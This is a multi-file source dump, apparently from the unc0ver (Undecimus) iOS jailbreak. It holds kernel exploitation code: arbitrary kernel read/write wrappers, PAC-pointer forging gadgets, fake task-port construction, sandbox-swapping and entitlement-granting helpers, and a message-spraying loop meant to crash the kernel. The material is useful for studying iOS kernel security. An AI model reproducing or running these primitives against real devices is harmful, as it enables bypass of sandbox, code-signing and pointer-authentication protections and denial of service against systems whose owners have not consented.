89 | bool set_proc_memstat_internal(kptr_t proc, bool set);
90 | bool get_proc_memstat_internal(kptr_t proc);
91 | size_t kstrlen(kptr_t ptr);
92 | kptr_t sstrdup(const char *str);
93 | kptr_t smalloc(size_t size);
94 | void sfree(kptr_t ptr);
95 | kptr_t IOMalloc(vm_size_t size);
96 | void IOFree(kptr_t address, vm_size_t size);
97 | int extension_create_file(kptr_t saveto, kptr_t sb, const char *path, size_t path_len, uint32_t subtype);
98 | int extension_create_mach(kptr_t saveto, kptr_t sb, const char *name, uint32_t subtype);
99 | int extension_add(kptr_t ext, kptr_t sb, const char *desc);
100 | void extension_release(kptr_t ext);
101 | void extension_destroy(kptr_t ext);
102 | bool set_file_extension(kptr_t sandbox, const char *exc_key, const char *path);
103 | bool set_mach_extension(kptr_t sandbox, const char *exc_key, const char *name);
104 | kptr_t proc_find(pid_t pid);
105 | void proc_rele(kptr_t proc);
106 | void proc_lock(kptr_t proc);
107 | void proc_unlock(kptr_t proc);
108 | void proc_ucred_lock(kptr_t proc);
109 | void proc_ucred_unlock(kptr_t proc);
110 | void vnode_lock(kptr_t vp);
111 | void vnode_unlock(kptr_t vp);
112 | void mount_lock(kptr_t mp);
113 | void mount_unlock(kptr_t mp);
114 | void task_set_platform_binary(kptr_t task, boolean_t is_platform);
115 | void kauth_cred_ref(kptr_t cred);
116 | void kauth_cred_unref(kptr_t cred);
117 | int chgproccnt(uid_t uid, int diff);
118 | kptr_t vfs_context_current(void);
119 | int vnode_lookup(const char *path, int flags, kptr_t *vpp, kptr_t ctx);
120 | int vnode_getfromfd(kptr_t ctx, int fd, kptr_t *vpp);
121 | int vn_getpath(kptr_t vp, char *pathbuf, int *len);
122 | int vnode_put(kptr_t vp);
123 | bool OSDictionary_SetItem(kptr_t OSDictionary, const char *key, kptr_t val);
124 | kptr_t OSDictionary_GetItem(kptr_t OSDictionary, const char *key);
125 | bool OSDictionary_Merge(kptr_t OSDictionary, kptr_t OSDictionary2);
126 | uint32_t OSDictionary_ItemCount(kptr_t OSDictionary);
127 | kptr_t OSDictionary_ItemBuffer(kptr_t OSDictionary);
128 | kptr_t OSDictionary_ItemKey(kptr_t buffer, uint32_t idx);
129 | kptr_t OSDictionary_ItemValue(kptr_t buffer, uint32_t idx);
130 | uint32_t OSArray_ItemCount(kptr_t OSArray);
131 | bool OSArray_Merge(kptr_t OSArray, kptr_t OSArray2);
132 | kptr_t OSArray_GetObject(kptr_t OSArray, uint32_t idx);
133 | void OSArray_RemoveObject(kptr_t OSArray, uint32_t idx);
134 | kptr_t OSArray_ItemBuffer(kptr_t OSArray);
135 | kptr_t OSObjectFunc(kptr_t OSObject, uint32_t off);
136 | void OSObject_Release(kptr_t OSObject);
137 | void OSObject_Retain(kptr_t OSObject);
138 | uint32_t OSObject_GetRetainCount(kptr_t OSObject);
139 | uint32_t OSString_GetLength(kptr_t OSString);
140 | kptr_t OSString_CStringPtr(kptr_t OSString);
141 | char *OSString_CopyString(kptr_t OSString);
142 | kptr_t OSUnserializeXML(const char *buffer);
143 | kptr_t get_exception_osarray(const char **exceptions, bool is_file_extension);
144 | char **copy_amfi_entitlements(kptr_t present);
145 | kptr_t getOSBool(bool value);
146 | bool entitle_process(kptr_t amfi_entitlements, const char *key, kptr_t val);
147 | bool set_sandbox_exceptions(kptr_t sandbox);
148 | bool check_for_exception(char **current_exceptions, const char *exception);
149 | bool set_amfi_exceptions(kptr_t amfi_entitlements, const char *exc_key, const char **exceptions, bool is_file_extension);
150 | bool set_exceptions(kptr_t sandbox, kptr_t amfi_entitlements);
151 | kptr_t get_amfi_entitlements(kptr_t cr_label);
152 | kptr_t get_sandbox(kptr_t cr_label);
153 | bool entitle_process_with_pid(pid_t pid, const char *key, kptr_t val);
154 | bool remove_memory_limit(void);
155 | bool restore_kernel_task_port(task_t *out_kernel_task_port);
156 | bool restore_kernel_base(uint64_t *out_kernel_base, uint64_t *out_kernel_slide);
157 | bool restore_kernel_offset_cache(void);
158 | bool restore_file_offset_cache(const char *offset_cache_file_path, kptr_t *out_kernel_base, uint64_t *out_kernel_slide);
159 | bool convert_port_to_task_port(mach_port_t port, kptr_t space, kptr_t task_kaddr);
160 | kptr_t make_fake_task(kptr_t vm_map);
161 | bool make_port_fake_task_port(mach_port_t port, kptr_t task_kaddr);
162 | bool set_hsp4(task_t port);
163 | kptr_t get_vnode_for_path(const char *path);
164 | kptr_t get_vnode_for_fd(int fd);
165 | char *get_path_for_fd(int fd);
166 | kptr_t get_vnode_for_snapshot(int fd, char *name);
167 | bool set_kernel_task_info(void);
168 | int issue_extension_for_mach_service(kptr_t sb, kptr_t ctx, const char *entry_name, void *desc);
169 | bool unrestrict_process(pid_t pid);
170 | bool unrestrict_process_with_task_port(task_t task_port);
171 | bool unrestrict_library(const char *path);
172 | bool unrestrict_library_with_fd(int fd);
173 | bool revalidate_process(pid_t pid);
174 | bool revalidate_process_with_task_port(task_t task_port);
175 | bool enable_mapping_for_library(const char *lib);
176 | bool enable_mapping_for_libraries(const char *libs);
177 | kptr_t find_vnode_with_fd(kptr_t proc, int fd);
178 | kptr_t find_vnode_with_path(const char *path);
179 | kptr_t swap_sandbox_for_proc(kptr_t proc, kptr_t sandbox);
180 |
181 | #endif /* kutils_h */
182 |
--------------------------------------------------------------------------------
/Undecimus/source/async_wake.h:
--------------------------------------------------------------------------------
1 | #ifndef async_wake_h
2 | #define async_wake_h
3 |
4 | #include
5 |
6 | bool async_wake_go(void);
7 |
8 | #endif /* async_wake_h */
9 |
--------------------------------------------------------------------------------
/Undecimus/source/diagnostics.h:
--------------------------------------------------------------------------------
1 | //
2 | // diagnostics.h
3 | // Undecimus
4 | //
5 | // Created by Pwn20wnd on 5/3/19.
6 | // Copyright © 2019 Pwn20wnd. All rights reserved.
7 | //
8 |
9 | #ifndef diagnostics_h
10 | #define diagnostics_h
11 |
12 | #include
13 |
14 | #define STATUS_FILE @"/var/lib/dpkg/status"
15 | #define CYDIA_LIST @"/etc/apt/cydiasources.d/cydia.list"
16 | //#define SILEO_LIST @"/etc/apt/sources.list.d/sileo.sources"
17 |
18 | NSArray *dependencyArrayFromString(NSString *depends);
19 | NSArray *parsedPackageArray(void);
20 | NSString *domainFromRepoObject(NSString *repoObject);
21 | NSArray *sourcesFromFile(NSString *theSourceFile);
22 | NSDictionary *getDiagnostics(void);
23 |
24 | #endif /* diagnostics_h */
25 |
--------------------------------------------------------------------------------
/Undecimus/source/early_kalloc.c:
--------------------------------------------------------------------------------
1 | //
2 | // early_kalloc.c
3 | // async_wake_ios
4 | //
5 | // Created by Ian Beer on 12/11/17.
6 | // Copyright © 2017 Ian Beer. All rights reserved.
7 | //
8 |
9 | #include "early_kalloc.h"
10 |
11 | #include
12 | #include
13 | #include
14 |
15 | #include "KernelMemory.h"
16 | #include "KernelOffsets.h"
17 | #include "KernelUtilities.h"
18 | #include "find_port.h"
19 | #include
20 |
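// Get a kalloc allocation before we've got a kcall interface to just call it.
//
// A message sized by message_size_for_kalloc_size(size) is sent to a freshly
// allocated port; the address stored in the port's message-queue field is then
// read, the field is cleared and the count field rewritten, and the address is
// returned to the caller.
//
// Returns that kernel address, or 0 when the request could not be set up
// (size too small for a message header, port or buffer allocation failure,
// or a failed send). No kernel memory is written on any of the failure paths.
uint64_t early_kalloc(int size)
{
    // The helper returns a plain int; reject values that cannot even hold a
    // header instead of letting a negative size wrap to a huge unsigned one.
    int wanted_size = message_size_for_kalloc_size(size);
    if (wanted_size < (int)sizeof(mach_msg_header_t)) {
        LOG("early kalloc size too small");
        return 0;
    }
    mach_msg_size_t msg_size = (mach_msg_size_t)wanted_size;

    mach_port_t port = MACH_PORT_NULL;
    kern_return_t err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
    if (err != KERN_SUCCESS) {
        LOG("unable to allocate port");
        return 0;
    }

    uint64_t port_kaddr = find_port_address(port, MACH_MSG_TYPE_MAKE_SEND);

    struct simple_msg {
        mach_msg_header_t hdr;
        char buf[0];
    };

    // calloc gives the zeroed buffer the original built with malloc + memset
    struct simple_msg* msg = calloc(1, msg_size);
    if (msg == NULL) {
        LOG("unable to allocate message");
        mach_port_destroy(mach_task_self(), port);
        return 0;
    }

    msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
    msg->hdr.msgh_size = msg_size;
    msg->hdr.msgh_remote_port = port;
    msg->hdr.msgh_local_port = MACH_PORT_NULL;
    msg->hdr.msgh_id = 0x41414142;

    err = mach_msg(&msg->hdr,
        MACH_SEND_MSG | MACH_MSG_OPTION_NONE,
        msg_size,
        0,
        MACH_PORT_NULL,
        MACH_MSG_TIMEOUT_NONE,
        MACH_PORT_NULL);

    // The send copies the message, so the user-space buffer is no longer needed
    free(msg);

    if (err != KERN_SUCCESS) {
        LOG("early kalloc failed to send message");
        mach_port_destroy(mach_task_self(), port);
        return 0;
    }

    // find the message buffer:

    uint64_t message_buffer = ReadKernel64(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE));
    LOG("message buffer: %llx", message_buffer);

    // leak the message buffer:
    WriteKernel64(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE), 0);
    WriteKernel32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT), 0x50000); // this is two uint16_ts, msg_count and qlimit

    return message_buffer;
}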
70 |
--------------------------------------------------------------------------------
/Undecimus/source/early_kalloc.h:
--------------------------------------------------------------------------------
1 | #ifndef early_kalloc_h
2 | #define early_kalloc_h
3 |
4 | #include
5 |
6 | uint64_t early_kalloc(int size);
7 |
8 | #endif
9 |
--------------------------------------------------------------------------------
/Undecimus/source/find_port.h:
--------------------------------------------------------------------------------
1 | #ifndef find_port_h
2 | #define find_port_h
3 |
4 | #include
5 |
6 | uint64_t find_port_address(mach_port_t port, int disposition);
7 |
8 | #endif /* find_port_h */
9 |
--------------------------------------------------------------------------------
/Undecimus/source/hideventsystem.h:
--------------------------------------------------------------------------------
1 | #ifndef hideventsystem_h
2 | #define hideventsystem_h
3 |
4 | #include
5 |
6 | // get a thread port from backboardd
7 | mach_port_t hid_event_queue_exploit(void);
8 |
9 | #endif /* hideventsystem_h */
10 |
--------------------------------------------------------------------------------
/Undecimus/source/jailbreak.h:
--------------------------------------------------------------------------------
1 | //
2 | // jailbreak.h
3 | // Undecimus
4 | //
5 | // Created by Pwn20wnd on 5/11/19.
6 | // Copyright © 2019 Pwn20wnd. All rights reserved.
7 | //
8 |
9 | #ifndef jailbreak_h
10 | #define jailbreak_h
11 |
12 | #include
13 |
14 | void jailbreak(void);
15 |
16 | #endif /* jailbreak_h */
17 |
--------------------------------------------------------------------------------
/Undecimus/source/jailbreak.m:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/source/jailbreak.m
--------------------------------------------------------------------------------
/Undecimus/source/kalloc_crash.c:
--------------------------------------------------------------------------------
1 | //
2 | // panic.c
3 | // Undecimus
4 | //
5 | // Created by Pwn20wnd on 4/20/19.
6 | // Copyright © 2019 Pwn20wnd. All rights reserved.
7 | //
8 |
9 | #include
10 | #include
11 | #include
12 | #include "kalloc_crash.h"
13 |
// A Mach message made of the standard header followed directly by payload bytes.
struct simple_msg
{
    mach_msg_header_t hdr;
    char buf[0]; // zero-length trailing array (a compiler extension); the payload occupies the bytes after hdr
};
19 |
/* credits to ian beer */
// Allocate a receive port, raise its queue limit to MACH_PORT_QLIMIT_LARGE and
// queue 256 copies of one message on it.
//
// replacer_message_body / replacer_body_size: payload copied after the header.
// Returns the port holding the queued messages. Any Mach failure prints a
// diagnostic and terminates the process with exit(EXIT_FAILURE).
static mach_port_t send_kalloc_message(uint8_t *replacer_message_body, uint32_t replacer_body_size)
{
    // allocate a port to send the messages to
    mach_port_t q = MACH_PORT_NULL;
    kern_return_t err;
    err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &q);
    if (err != KERN_SUCCESS)
    {
        printf(" [-] failed to allocate port\n");
        exit(EXIT_FAILURE);
    }

    // allow more messages to be queued on the port than the default limit
    mach_port_limits_t limits = {0};
    limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE;
    err = mach_port_set_attributes(mach_task_self(),
                                   q,
                                   MACH_PORT_LIMITS_INFO,
                                   (mach_port_info_t)&limits,
                                   MACH_PORT_LIMITS_INFO_COUNT);
    if (err != KERN_SUCCESS)
    {
        printf(" [-] failed to increase queue limit\n");
        exit(EXIT_FAILURE);
    }

    // header plus payload; only the header part is zeroed, the payload is copied in
    mach_msg_size_t msg_size = sizeof(struct simple_msg) + replacer_body_size;
    struct simple_msg *msg = malloc(msg_size);
    memset(msg, 0, sizeof(struct simple_msg));
    memcpy(&msg->buf[0], replacer_message_body, replacer_body_size);

    for (int i = 0; i < 256; i++)
    {
        // the header is filled in again before every send
        msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
        msg->hdr.msgh_size = msg_size;
        msg->hdr.msgh_remote_port = q;
        msg->hdr.msgh_local_port = MACH_PORT_NULL;
        msg->hdr.msgh_id = 0x41414142;

        err = mach_msg(&msg->hdr,
                       MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
                       msg_size,
                       0,
                       MACH_PORT_NULL,
                       MACH_MSG_TIMEOUT_NONE,
                       MACH_PORT_NULL);

        if (err != KERN_SUCCESS)
        {
            printf(" [-] failed to send message %x (%d): %s\n", err, i, mach_error_string(err));
            exit(EXIT_FAILURE);
        }
    }

    return q;
}
76 |
// Map a target kalloc size to the message size used for it: three quarters of
// `size`, less 0x74. The arithmetic is unsigned 32-bit throughout, so a small
// `size` wraps around to a very large result instead of going negative.
static uint32_t message_size_for_kalloc_size(uint32_t size)
{
    const uint32_t three_quarters = (size * 3) / 4;
    const uint32_t overhead = 0x74;
    return three_quarters - overhead;
}
81 |
// Loop forever, each pass queueing a batch of large messages on a new port
// through send_kalloc_message(). The returned port is discarded, so the queued
// messages are never received here. The function never returns; per its name,
// the intended outcome is a crash.
void do_kalloc_crash() {
    for (;;) {
        uint32_t body_size = message_size_for_kalloc_size(16384) - sizeof(mach_msg_header_t); // message_size_for_kalloc_size(16384) is 12172; the body is that minus the header size (the earlier "1024" note did not match the arithmetic)
        uint8_t *body = malloc(body_size);
        memset(body, 0x41, body_size);
        send_kalloc_message(body, body_size);
        SafeFreeNULL(body);
    }
}
91 |
--------------------------------------------------------------------------------
/Undecimus/source/kalloc_crash.h:
--------------------------------------------------------------------------------
1 | //
2 | // panic.h
3 | // Undecimus
4 | //
5 | // Created by Pwn20wnd on 4/20/19.
6 | // Copyright © 2019 Pwn20wnd. All rights reserved.
7 | //
8 |
9 | #ifndef panic_h
10 | #define panic_h
11 |
12 | #include
13 |
14 | void do_kalloc_crash(void);
15 |
16 | #endif /* panic_h */
17 |
--------------------------------------------------------------------------------
/Undecimus/source/kc_parameters.h:
--------------------------------------------------------------------------------
1 | /*
2 | * kernel_call/kc_parameters.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__KERNEL_CALL__KC_PARAMETERS_H_
6 | #define VOUCHER_SWAP__KERNEL_CALL__KC_PARAMETERS_H_
7 |
8 | #include
9 | #include
10 | #include
11 |
12 | #include "parameters.h"
13 |
14 | #ifdef KERNEL_CALL_PARAMETERS_EXTERN
15 | #define extern KERNEL_CALL_PARAMETERS_EXTERN
16 | #endif
17 |
18 | // A structure describing the PAC codes used as part of the context for signing and verifying
19 | // virtual method pointers in a vtable.
20 | struct vtable_pac_codes {
21 | size_t count;
22 | const uint16_t *codes;
23 | };
24 |
25 | // Generate the name for an offset in a virtual method table.
26 | #define VTABLE_INDEX(class_, method_) _##class_##_##method_##__vtable_index_
27 |
28 | // Generate the name for a list of vtable PAC codes.
29 | #define VTABLE_PAC_CODES(class_) _##class_##__vtable_pac_codes_
30 |
31 | // A helper macro for INIT_VTABLE_PAC_CODES().
32 | #define VTABLE_PAC_CODES_DATA(class_) _##class_##__vtable_pac_codes_data_
33 |
34 | // Initialize a list of vtable PAC codes. In order to store the PAC code array in constant memory,
35 | // we place it in a static variable. Consequently, this macro will produce name conflicts if used
36 | // outside a function.
37 | #define INIT_VTABLE_PAC_CODES(class_, ...) \
38 | static const uint16_t VTABLE_PAC_CODES_DATA(class_)[] = { __VA_ARGS__ }; \
39 | VTABLE_PAC_CODES(class_) = (struct vtable_pac_codes) { \
40 | .count = sizeof(VTABLE_PAC_CODES_DATA(class_)) / sizeof(uint16_t), \
41 | .codes = (const uint16_t *) VTABLE_PAC_CODES_DATA(class_), \
42 | }
43 |
44 | extern uint64_t ADDRESS(paciza_pointer__l2tp_domain_module_start);
45 | extern uint64_t ADDRESS(paciza_pointer__l2tp_domain_module_stop);
46 | extern uint64_t ADDRESS(l2tp_domain_inited);
47 | extern uint64_t ADDRESS(sysctl__net_ppp_l2tp);
48 | extern uint64_t ADDRESS(sysctl_unregister_oid);
49 | extern uint64_t ADDRESS(mov_x0_x4__br_x5);
50 | extern uint64_t ADDRESS(mov_x9_x0__br_x1);
51 | extern uint64_t ADDRESS(mov_x10_x3__br_x6);
52 | extern uint64_t ADDRESS(kernel_forge_pacia_gadget);
53 | extern uint64_t ADDRESS(kernel_forge_pacda_gadget);
54 | extern uint64_t ADDRESS(IOUserClient__vtable);
55 | extern uint64_t ADDRESS(IORegistryEntry__getRegistryEntryID);
56 |
57 | extern size_t SIZE(kernel_forge_pacxa_gadget_buffer);
58 | extern size_t OFFSET(kernel_forge_pacxa_gadget_buffer, first_access);
59 | extern size_t OFFSET(kernel_forge_pacxa_gadget_buffer, pacia_result);
60 | extern size_t OFFSET(kernel_forge_pacxa_gadget_buffer, pacda_result);
61 |
62 | extern struct vtable_pac_codes VTABLE_PAC_CODES(IOAudio2DeviceUserClient);
63 | extern struct vtable_pac_codes VTABLE_PAC_CODES(IODTNVRAM);
64 |
65 | // Parameters for IOAudio2DeviceUserClient.
66 | extern size_t OFFSET(IOAudio2DeviceUserClient, traps);
67 |
68 | // Parameters for IOExternalTrap.
69 | extern size_t SIZE(IOExternalTrap);
70 | extern size_t OFFSET(IOExternalTrap, object);
71 | extern size_t OFFSET(IOExternalTrap, function);
72 | extern size_t OFFSET(IOExternalTrap, offset);
73 |
74 | // Parameters for IORegistryEntry.
75 | extern size_t OFFSET(IORegistryEntry, reserved);
76 | extern size_t OFFSET(IORegistryEntry__ExpansionData, fRegistryEntryID);
77 |
78 | // Parameters for IOUserClient.
79 | extern uint32_t VTABLE_INDEX(IOUserClient, getExternalTrapForIndex);
80 | extern uint32_t VTABLE_INDEX(IOUserClient, getTargetAndTrapForIndex);
81 |
82 | /*
83 | * kernel_call_parameters_init
84 | *
85 | * Description:
86 | * Initialize the addresses used in the kernel_call subsystem.
87 | */
88 | bool kernel_call_parameters_init(void);
89 |
90 | #undef extern
91 |
92 | #endif
93 |
--------------------------------------------------------------------------------
/Undecimus/source/kernel_call.c:
--------------------------------------------------------------------------------
1 | /*
2 | * kernel_call.c
3 | * Brandon Azad
4 | */
5 | #include "kernel_call.h"
6 |
7 | #include
8 |
9 | #include "pac.h"
10 | #include "user_client.h"
11 | #include "log.h"
12 |
13 | // ---- Public API --------------------------------------------------------------------------------
14 |
// Bring up the three kernel call stages in order. The && chain short-circuits, so a stage runs
// only if every earlier stage reported success. On any failure the whole subsystem is torn down
// again through kernel_call_deinit() before false is returned.
bool
kernel_call_init() {
	if (stage1_kernel_call_init()
			&& stage2_kernel_call_init()
			&& stage3_kernel_call_init()) {
		return true;
	}
	kernel_call_deinit();
	return false;
}
25 |
// Tear down the kernel call stages in the reverse of the order in which kernel_call_init()
// brings them up: stage 3 first, stage 1 last. kernel_call_init() also calls this after a
// partial initialization, so every stage's deinit routine is invoked even if that stage was
// never initialized.
void
kernel_call_deinit() {
	stage3_kernel_call_deinit();
	stage2_kernel_call_deinit();
	stage1_kernel_call_deinit();
}
32 |
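// Variadic front end for kernel_call_7v(): collects up to 7 arguments from the variable argument
// list into an array and forwards them.
//
// Each variadic argument is read back with va_arg(ap, uint64_t), so callers must pass every
// argument as a 64-bit value. The restrictions documented for kernel_call_7v() apply.
uint32_t
kernel_call_7(uint64_t function, size_t argument_count, ...) {
	assert(argument_count <= 7);
	// When assert() is compiled out (NDEBUG), clamp the count so that kernel_call_7v() is never
	// told to read more entries than the 7-element array below holds.
	size_t count = (argument_count <= 7 ? argument_count : 7);
	// Zero-fill so that unused slots never carry stale stack contents.
	uint64_t arguments[7] = { 0 };
	va_list ap;
	va_start(ap, argument_count);
	for (size_t i = 0; i < count; i++) {
		arguments[i] = va_arg(ap, uint64_t);
	}
	va_end(ap);
	return kernel_call_7v(function, count, arguments);
}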
45 |
--------------------------------------------------------------------------------
/Undecimus/source/kernel_call.h:
--------------------------------------------------------------------------------
1 | /*
2 | * kernel_call.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__KERNEL_CALL_H_
6 | #define VOUCHER_SWAP__KERNEL_CALL_H_
7 |
8 | #include
9 | #include
10 | #include
11 |
12 | /*
13 | * kernel_call_init
14 | *
15 | * Description:
16 | * Initialize kernel_call functions.
17 | */
18 | bool kernel_call_init(void);
19 |
20 | /*
21 | * kernel_call_deinit
22 | *
23 | * Description:
24 | * Deinitialize the kernel call subsystem and restore the kernel to a safe state.
25 | */
26 | void kernel_call_deinit(void);
27 |
28 | /*
29 | * kernel_call_7
30 | *
31 | * Description:
32 | * Call a kernel function with the specified arguments.
33 | *
34 | * Restrictions:
35 | * See kernel_call_7v().
36 | */
37 | uint32_t kernel_call_7(uint64_t function, size_t argument_count, ...);
38 |
39 | /*
40 | * kernel_call_7v
41 | *
42 | * Description:
43 | * Call a kernel function with the specified arguments.
44 | *
45 | * Restrictions:
46 | * At most 7 arguments can be passed.
47 | * arguments[0] must be nonzero.
48 | * The return value is truncated to 32 bits.
49 | */
50 | uint32_t kernel_call_7v(uint64_t function, size_t argument_count, const uint64_t arguments[]);
51 |
52 | /*
53 | * kernel_forge_pacia
54 | *
55 | * Description:
56 | * Forge a PACIA pointer using the kernel forging gadget.
57 | */
58 | uint64_t kernel_forge_pacia(uint64_t pointer, uint64_t context);
59 |
60 | /*
61 | * kernel_forge_pacia_with_type
62 | *
63 | * Description:
64 | * Forge a PACIA pointer using the specified address, with the upper 16 bits replaced by the
65 | * type code, as context.
66 | */
67 | uint64_t kernel_forge_pacia_with_type(uint64_t pointer, uint64_t address, uint16_t type);
68 |
69 | /*
70 | * kernel_forge_pacda
71 | *
72 | * Description:
73 | * Forge a PACDA pointer using the kernel forging gadget.
74 | */
75 | uint64_t kernel_forge_pacda(uint64_t pointer, uint64_t context);
76 |
77 | /*
78 | * kernel_xpaci
79 | *
80 | * Description:
81 | * Strip a PACIx code from a kernel pointer.
82 | */
83 | uint64_t kernel_xpaci(uint64_t pointer);
84 |
85 | /*
86 | * kernel_xpacd
87 | *
88 | * Description:
89 | * Strip a PACDx code from a kernel pointer.
90 | */
91 | uint64_t kernel_xpacd(uint64_t pointer);
92 |
93 | #endif
94 |
--------------------------------------------------------------------------------
/Undecimus/source/kernel_memory.c:
--------------------------------------------------------------------------------
1 | /*
2 | * kernel_memory.c
3 | * Brandon Azad
4 | */
5 | #define KERNEL_MEMORY_EXTERN
6 | #include "kernel_memory.h"
7 |
8 | #include "log.h"
9 | #include "mach_vm.h"
10 | #include "parameters.h"
11 |
12 | // ---- Kernel memory functions -------------------------------------------------------------------
13 |
// Read `size` bytes of kernel memory starting at `address` into `data`. This is a thin adapter
// over rkbuffer(), which is defined outside this file; its result is returned unchanged.
bool
kernel_read(uint64_t address, void *data, size_t size) {
	extern bool rkbuffer(uint64_t kaddr, void* buffer, size_t length);
	bool ok = rkbuffer(address, data, size);
	return ok;
}
19 |
// Write `size` bytes from `data` to kernel memory starting at `address`. This is a thin adapter
// over wkbuffer(), which is defined outside this file; its result is returned unchanged.
bool
kernel_write(uint64_t address, const void *data, size_t size) {
	extern bool wkbuffer(uint64_t kaddr, void* buffer, size_t length);
	// wkbuffer() takes a non-const buffer, so the const qualifier is cast away here.
	void *source = (void *)data;
	return wkbuffer(address, source, size);
}
25 |
// Read one byte of kernel memory. On failure the function returns -1 converted to uint8_t
// (0xff), so a failed read cannot be told apart from a byte that really holds 0xff; callers
// that need to detect failure should use kernel_read() and check its result.
uint8_t
kernel_read8(uint64_t address) {
	uint8_t byte;
	if (!kernel_read(address, &byte, sizeof(byte))) {
		return -1;
	}
	return byte;
}
35 |
// Read a 16-bit value from kernel memory. On failure the function returns -1 converted to
// uint16_t (0xffff), which is indistinguishable from a stored 0xffff; callers that need to
// detect failure should use kernel_read() and check its result.
uint16_t
kernel_read16(uint64_t address) {
	uint16_t half;
	if (!kernel_read(address, &half, sizeof(half))) {
		return -1;
	}
	return half;
}
45 |
// Read a 32-bit value from kernel memory. On failure the function returns -1 converted to
// uint32_t (0xffffffff), which is indistinguishable from a stored 0xffffffff; callers that need
// to detect failure should use kernel_read() and check its result.
uint32_t
kernel_read32(uint64_t address) {
	uint32_t word;
	if (!kernel_read(address, &word, sizeof(word))) {
		return -1;
	}
	return word;
}
55 |
// Read a 64-bit value from kernel memory. On failure the function returns -1 converted to
// uint64_t (all bits set), which is indistinguishable from a stored all-ones value; callers that
// need to detect failure should use kernel_read() and check its result.
uint64_t
kernel_read64(uint64_t address) {
	uint64_t quad;
	if (!kernel_read(address, &quad, sizeof(quad))) {
		return -1;
	}
	return quad;
}
65 |
// Write a single byte to kernel memory; returns the result of kernel_write().
bool
kernel_write8(uint64_t address, uint8_t value) {
	bool ok = kernel_write(address, &value, sizeof(uint8_t));
	return ok;
}
70 |
// Write a 16-bit value to kernel memory; returns the result of kernel_write().
bool
kernel_write16(uint64_t address, uint16_t value) {
	bool ok = kernel_write(address, &value, sizeof(uint16_t));
	return ok;
}
75 |
// Write a 32-bit value to kernel memory; returns the result of kernel_write().
bool
kernel_write32(uint64_t address, uint32_t value) {
	bool ok = kernel_write(address, &value, sizeof(uint32_t));
	return ok;
}
80 |
// Write a 64-bit value to kernel memory; returns the result of kernel_write().
bool
kernel_write64(uint64_t address, uint64_t value) {
	bool ok = kernel_write(address, &value, sizeof(uint64_t));
	return ok;
}
85 |
86 | // ---- Kernel utility functions ------------------------------------------------------------------
87 |
// Resolve a Mach port name in the given task to kernel addresses.
//
// Parameters:
//	task		Kernel address of the task whose ipc_space is searched.
//	port_name	The Mach port name to look up.
//	ipc_port	If non-NULL, receives the value read from the entry's ie_object field.
//	ipc_entry	If non-NULL, receives the address of the port's ipc_entry.
//
// Returns false if the port index is not below is_table_size, true otherwise.
//
// NOTE(review): none of the kernel_read32()/kernel_read64() results are checked. Those helpers
// return all-ones on failure, so a failed read of is_table_size makes the bounds check pass for
// almost any index, and the function can return true with addresses derived from failed reads.
bool
kernel_ipc_port_lookup(uint64_t task, mach_port_name_t port_name,
		uint64_t *ipc_port, uint64_t *ipc_entry) {
	// Locate the task's ipc_space and read how many entries its table holds.
	uint64_t space = kernel_read64(task + OFFSET(task, itk_space));
	uint32_t table_size = kernel_read32(space + OFFSET(ipc_space, is_table_size));
	// Reject port names whose index falls outside the table.
	uint32_t index = MACH_PORT_INDEX(port_name);
	if (index >= table_size) {
		return false;
	}
	// The entry lives at is_table + index * sizeof(ipc_entry).
	uint64_t table = kernel_read64(space + OFFSET(ipc_space, is_table));
	uint64_t entry_address = table + index * SIZE(ipc_entry);
	if (ipc_entry != NULL) {
		*ipc_entry = entry_address;
	}
	// The extra read for the port address is only issued when the caller asked for it.
	if (ipc_port != NULL) {
		*ipc_port = kernel_read64(entry_address + OFFSET(ipc_entry, ie_object));
	}
	return true;
}
112 |
--------------------------------------------------------------------------------
/Undecimus/source/kernel_memory.h:
--------------------------------------------------------------------------------
1 | /*
2 | * kernel_memory.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__KERNEL_MEMORY_H_
6 | #define VOUCHER_SWAP__KERNEL_MEMORY_H_
7 |
8 | #include
9 | #include
10 | #include
11 | #include
12 |
13 | #ifdef KERNEL_MEMORY_EXTERN
14 | #define extern KERNEL_MEMORY_EXTERN
15 | #endif
16 |
17 | /*
18 | * kernel_task_port
19 | *
20 | * Description:
21 | * The kernel task port.
22 | */
23 | extern mach_port_t kernel_task_port;
24 |
25 | /*
26 | * kernel_task
27 | *
28 | * Description:
29 | * The address of the kernel_task in kernel memory.
30 | */
31 | extern uint64_t kernel_task;
32 |
33 | /*
34 | * current_task
35 | *
36 | * Description:
37 | * The address of the current task in kernel memory.
38 | */
39 | extern uint64_t current_task;
40 |
41 | /*
42 | * kernel_read
43 | *
44 | * Description:
45 | * Read data from kernel memory.
46 | */
47 | bool kernel_read(uint64_t address, void *data, size_t size);
48 |
49 | /*
50 | * kernel_write
51 | *
52 | * Description:
53 | * Write data to kernel memory.
54 | */
55 | bool kernel_write(uint64_t address, const void *data, size_t size);
56 |
57 | /*
58 | * kernel_read8
59 | *
60 | * Description:
61 | * Read a single byte from kernel memory. If the read fails, -1 is returned.
62 | */
63 | uint8_t kernel_read8(uint64_t address);
64 |
65 | /*
66 | * kernel_read16
67 | *
68 | * Description:
69 | * Read a 16-bit value from kernel memory. If the read fails, -1 is returned.
70 | */
71 | uint16_t kernel_read16(uint64_t address);
72 |
73 | /*
74 | * kernel_read32
75 | *
76 | * Description:
77 | * Read a 32-bit value from kernel memory. If the read fails, -1 is returned.
78 | */
79 | uint32_t kernel_read32(uint64_t address);
80 |
81 | /*
82 | * kernel_read64
83 | *
84 | * Description:
